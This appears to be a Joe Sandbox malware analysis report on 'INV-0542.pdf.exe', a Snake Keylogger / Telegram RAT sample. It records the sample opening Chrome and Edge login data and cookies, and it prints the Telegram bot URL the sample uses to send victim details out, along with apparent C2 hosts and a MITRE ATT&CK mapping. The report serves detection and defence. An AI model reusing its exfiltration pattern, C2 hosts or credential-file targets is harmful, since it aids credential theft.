Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

0_2_0040351C

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 3652, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 3652, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 3652, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	12 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	131 Virtualization/Sandbox Evasion	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
INV-0542.pdf.exe	11%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe	11%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://crl.micro=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.19.174	true	false	high
drive.usercontent.google.com	142.250.181.1	true	false	high
reallyfreegeoip.org	172.67.177.134	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20and%20Time:%2026/11/2024%20/%2020:06:18%0D%0ACountry%20Name:%20United%20States%0D%0A[%20238576%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]	false	high
https://reallyfreegeoip.org/xml/8.46.123.75	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20a	msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000005.00000002.3302092440.0000000021A50000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A41000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A81000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/lBW	msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.75$	msiexec.exe, 00000005.00000002.3302092440.0000000021909000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.000000002194E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBjq	powershell.exe, 00000002.00000002.2413511774.00000000047D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro=	powershell.exe, 00000002.00000002.2412724868.00000000029B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://apis.google.com	msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2413511774.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlBjq	msiexec.exe, 00000005.00000002.3302092440.0000000021A4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000005.00000002.3302092440.00000000218DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/	msiexec.exe, 00000005.00000002.3302092440.0000000021A81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A72000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/$E	msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000005.00000002.3286405273.0000000000779000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2540711816.000000000077E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lBjq	msiexec.exe, 00000005.00000002.3302092440.0000000021A7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	INV-0542.pdf.exe, INV-0542.pdf.exe.2.dr	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/U	msiexec.exe, 00000005.00000002.3286405273.0000000000779000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2540711816.000000000077E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 00000005.00000002.3302092440.000000002194E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.00000000218DE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.181.1	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.217.19.174	drive.google.com	United States	15169	GOOGLEUS	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562595
Start date and time:	2024-11-25 18:42:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	INV-0542.pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/16@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 88% Number of executed functions: 123 Number of non-executed functions: 99
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 3652 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5776 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: INV-0542.pdf.exe

Simulations

Behavior and APIs

Time	Type	Description
12:42:58	API Interceptor	42x Sleep call for process: powershell.exe modified
12:43:52	API Interceptor	210529x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Papyment_Advice.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	sosoliso.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	DJ5PhUwOsM.exe	Get hash	malicious	AgentTesla, XWorm	Browse
	2ehwX6LWt3.exe	Get hash	malicious	XWorm	Browse
	Mzo6BdEtGv.exe	Get hash	malicious	XWorm	Browse
	tE3ZXBTP0B.exe	Get hash	malicious	XWorm	Browse
	Pe4905VGl1.bat	Get hash	malicious	AsyncRAT	Browse
	MSM8C42iAN.exe	Get hash	malicious	DarkCloud	Browse
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	wMy37vlfvz.exe	Get hash	malicious	DarkCloud	Browse
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
172.67.177.134	jbuESggTv0.exe	Get hash	malicious	Snake Keylogger	Browse
	tJzfnaqOxj.exe	Get hash	malicious	Snake Keylogger	Browse
	LAQfpnQvPQ.exe	Get hash	malicious	Snake Keylogger	Browse
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	F7Xu8bRnXT.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	DJ5PhUwOsM.exe	Get hash	malicious	AgentTesla, XWorm	Browse	149.154.167.220
	2ehwX6LWt3.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Mzo6BdEtGv.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	tE3ZXBTP0B.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Pe4905VGl1.bat	Get hash	malicious	AsyncRAT	Browse	149.154.167.220
	MSM8C42iAN.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	wMy37vlfvz.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
checkip.dyndns.com	jbuESggTv0.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	tJzfnaqOxj.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	LAQfpnQvPQ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	F7Xu8bRnXT.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	denizbank 25.11.2024 E80 aspc.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
